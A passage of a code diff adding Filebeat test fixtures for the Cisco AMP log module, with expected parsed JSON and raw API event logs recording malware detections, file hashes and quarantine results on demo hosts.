"cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176258014979293255", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 581000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176258014979293000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 52548, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:13:17.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176257963439685702", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 569000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176257963439686000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 53867, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:12:53.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533667579691532307", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 778000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533667579691532000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 55186, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:12:53.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.DFC.MalParent", + "cisco.amp.detection_id": "6533667579691532306", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 747000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533667579691532000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 56512, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:12:53.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.DFC.MalParent", + "cisco.amp.detection_id": "6533667579691532305", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 371000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533667579691532000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 57830, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + } +] \ No newline at end of file diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp4.ndjson.log b/x-pack/filebeat/module/cisco/amp/test/cisco_amp4.ndjson.log new file mode 100644 index 00000000000..f31bf18a23a --- /dev/null +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp4.ndjson.log @@ -0,0 +1,100 @@ +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6508397899087348000,"timestamp":1610659036,"timestamp_nanoseconds":295927133,"date":"2021-01-14T21:17:16+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.6A37D750F0-100.SBX.TG","detection_id":"6508397899087347713","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86","sha1":"5ca4bef8de6def53519d4b22632675bb4c1e470b","md5":"41476df3138717868118d8542cf3d1d6"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14930696955218,"timestamp":1610656706,"timestamp_nanoseconds":844899579,"date":"2021-01-14T20:38:26+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"W32.E4FCCBFA69-95.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610656706,"start_date":"2021-01-14T20:38:26+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"},"parent":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":587000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6412680266518626319","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":494000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6412680266518626317","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":587000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626319","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"28242311.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"},"parent":{"process_id":7120,"disposition":"Malicious","file_name":"QuotaGroup.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014","sha1":"f504774b72acfb23a46217aec9c6559fd7e4df64","md5":"b5ede95ec8bc4ad6984758be42b152bd"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":572000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626318","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014","sha1":"f504774b72acfb23a46217aec9c6559fd7e4df64","md5":"b5ede95ec8bc4ad6984758be42b152bd"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":494000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626317","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"28242311.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"},"parent":{"process_id":4788,"disposition":"Malicious","file_name":"28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":478000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626316","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"28242311.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014","sha1":"f504774b72acfb23a46217aec9c6559fd7e4df64","md5":"b5ede95ec8bc4ad6984758be42b152bd"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":587000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6412680266518626318","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":494000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6412680266518626316","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303574240493599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303574240493597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526295","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526294","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526293","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526292","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526291","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 